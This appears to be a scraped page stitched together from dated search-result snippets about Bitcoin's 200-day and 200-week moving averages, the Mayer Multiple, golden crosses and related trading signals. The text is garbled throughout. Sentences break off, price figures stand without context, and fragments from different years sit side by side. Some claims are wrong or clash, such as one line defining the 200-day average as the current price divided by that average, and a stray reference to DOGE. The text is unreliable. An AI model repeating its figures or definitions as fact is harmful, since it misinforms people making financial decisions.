moving average (SMA), a good indicator of long-term price trends in About Mayer Multiple. 50-Day Moving Average . 200-Day: 5,172. Related Charts. The Signal line, a 9-day EMA of the MACD line, serves as a trigger for buy/sell signals. 31. 00 (0. Bitcoin Charts Updated Every 10-Seconds. Essentially, a bullish crossover happens when the 50-day MA value moves above the 200-day MA value. Feb 26, 2024 · In contrast, moving averages offer a brighter outlook, with crucial signals from the 10-day to the 200-day consistently indicating upward trends, aside from the 10-day exponential (EMA) and simple Mar 27, 2022 · 200-day Moving Average vs 50-day Moving Average. MORE FOR YOU. Aug 9, 2021 · Bitcoin (BTC) traded above its 200-day simple moving average at 44,847 on Sunday, Aug. Bitbo Pro users get the Bitcoin price updated on Bitbo's charts every 10 seconds, not only every 5 minutes. Aug 31, 2023 · BTC price action is all about the 200-day moving average into the monthly close, with opinions on the outlook increasingly polarized. 18, 2024 10:22 AM ET Bitcoin USD (BTC-USD) Crypto FBTC , IBIT 7 Comments 8 Likes Walter Zelezniak Jr How to Interpret Simple Moving Average 1458. The Moving Average is the average price of the security or contact for the Period shown. 1. A 200-Week Moving Average Chart for Bitcoin is a long-term technical analysis tool used by traders and investors to understand the long-term trend direction of Bitcoin's price. 3 days ago · CoinDesk Bitcoin Price Index (XBX) advanced cryptocurrency charts by MarketWatch. Day traders might not find the 200-day MA as useful, while long-term traders may not benefit much from an indicator focused on a short timeframe. 200-week moving average forms Jan 1, 2012 · The Mayer Multiple is the multiple of the current Bitcoin price over the 200-day moving average. It's computed by summing up an asset's closing prices over the last 50 days, and then dividing that sum by 50. Aug 23, 2024 · The second trigger for a 18% rally comes from Bitcoin’s 200-day moving average, the red line in the chart above. Here are the key components of Bollinger Bands: Historical and current bitcoin price and 200-day simple moving average. The Mayer Multiple is the multiple of the current Bitcoin price over the 200-day moving average. Based on the method of calculation, the most effective moving averages are: Simple Moving Average; Exponential Moving Average; Weighted Moving Average; Let’s look at them Interactive Chart for Bitcoin USD (BTC-USD), analyze all the data with a huge range of indicators. 4. Oct 1, 2023 · The 200-day moving average is represented as a line on charts and represents the average price over the past 200 days (or 40 weeks). S. Source: TradingView “All eyes” on 200-day moving averages 200-Day: 2,995. 530 +59. let's say you were looking at a simple 5-day moving average. Looking for new trading ideas to jump-start each day? For less than $10 a month, you can, with a Barchart Plus Membership. illuminated by the 30 to 200-day EMAs and SMAs Another important signal is a crossover between the 50-day and the 200-day moving averages. Introduced by Trace Mayer as a way to gauge the current price of Bitcoin against its long range historical price movements (200 day moving average), the Mayer Multiple highlights when Bitcoin is overbought or oversold in the context of longer time frames. Advanced Chart. Now, calculating the bitcoin 200 day moving average is a little more complicated than doing it for a stock Long-Term Trends: By looking at a 300-week MA, you're zooming out on the Bitcoin price chart. The two Moving averages should be of two different term lengths. Aug 13, 2021 · What Is The Bitcoin 200 Day Moving Average? The Bitcoin 200 day moving average is exactly what it sounds like. The 200-day moving average serves as a critical technical indicator for assessing Bitcoin’s long-term price trends. BTC/USD 1-hour chart. Daily update on current bitcoin close price. You take the closing price of each day, add Nov 24, 2017 · The 200 day moving average is the current price divided by the average of the previous 200 day prices. The heave selling volume (pictured in red underneath the price bars) of 11/8 and 11/9 are confirming factors. Charts that show Bitcoin moving averages. Source: TradingView Bitcoin vs. For each day on the graph we sum prices for the previous 1458 days and divide it by 1458 (the arithmetic average). Aug 8, 2023 · Do note that we used the 200-day moving averages here as longish timeframes are good for making long-term trading decisions. 87% return in these trending markets is impressive. Bitcoin's 200-day average is on track to challenge its previous peak of $49,452 The 200-week moving average heatmap is a visual tool based on Bitcoin price, used to display how Bitcoin price is performing relative to its 200-week moving average. Reading the MACD Chart. BTC/USD 1-day candle chart (Bitstamp) with 200-day The 200 Week Moving Average Heatmap is a visual representation of Bitcoin's price action relative to its 200 week moving average. They are used to measure the volatility of a financial asset, like Bitcoin, over a specified period of time. 3 days ago · Bitcoin (BTC) Technical Analysis. Bitcoin trading: Momentum strategies with different moving averages Sep 6, 2024 · The 200-day simple moving average (SMA) of bitcoin's price, a widely tracked barometer of the largest cryptocurrency's long-term trajectory, is about to lose its bullish momentum ahead of key U. Detailed technical analysis. Below we calculate the simple moving average for bitcoin for a period of 4 years (1458 days). The 200-Week Moving Average Heatmap chart uses a color heatmap to show the percent increase in the 200 week moving average, showing a colored point relative to that movement every 4 weeks. NYSE Bitcoin Index (DISCONTINUED) (^NYB) 30140. Why 2. For example a 50 Day Simple Moving Average (medium-term) and a 200 Day Simple Moving Average (long-term) The signals or potential trading opportunities occur when the shorter term SMA crosses above or below the longer term SMA. Generally, longer periods tend to form stronger, lasting breakouts. The biggest portion of the move can be caught Mar 22, 2024 · Amidst a backdrop of neutral oscillators and a mixed sentiment in moving averages, bitcoin traders are navigating through a volatile environment. Customizable interactive chart for Bitcoin - USD with latest real-time price quote, charts, latest news, technical analysis and opinions. 47 0. It does NOT tell whether to buy, sell or hold. Apr 23, 2024 · The 200-day simple moving average is one of the most widely tracked indicators of the long-term trend. Aug 18, 2023 · Bitcoin traded as low as $15,479 on November 21, 2022 and closed above its 200-day simple moving average on January 13, 2023 when this average was $19,515. May 7, 2024 · The Bitcoin 200-day moving average is at an all-time high of $50,178, a key technical indicator for predicting long-term Bitcoin price trends suggesting a bullish long-term outlook. 4-Year Moving Average . See the chart, key points, and related charts for more analysis. . 77% 1 month 3. 59 Historical volatility is Jun 7, 2021 · The weekly chart for bitcoin is negative, which favors a sell on strength strategy. 8. 50-day, 100-day and 200-day moving averages are among the most commonly used indicators in the crypto market to identify important resistance and support levels. View This Chart. 10 Wall Street open as United States equities dipped further. Apr 21, 2022 · Bullish signals for bitcoin have emerged, favoring a continued price rally toward the widely tracked 200-day simple moving average (SMA), according to a technical analysis by Katie Stockton A 4-Year Moving Average for Bitcoin is a significant long-term trend indicator that plays a crucial role in understanding Bitcoin's price behavior over extended periods. Learn how to use the 200-DMA to assess the long-term trend of Bitcoin. It is well-known as golden cross and signals that a new bullish trend for the DOGE USD price is starting. BTC/USD 1-hour chart with 200-day EMA. It’s a line on a chart that shows the average price of bitcoin over the past 200 days. Aug 18, 2024 · The 200-day moving average is seen as one of the most significant indicators, particularly in the context of the 50-day moving average. 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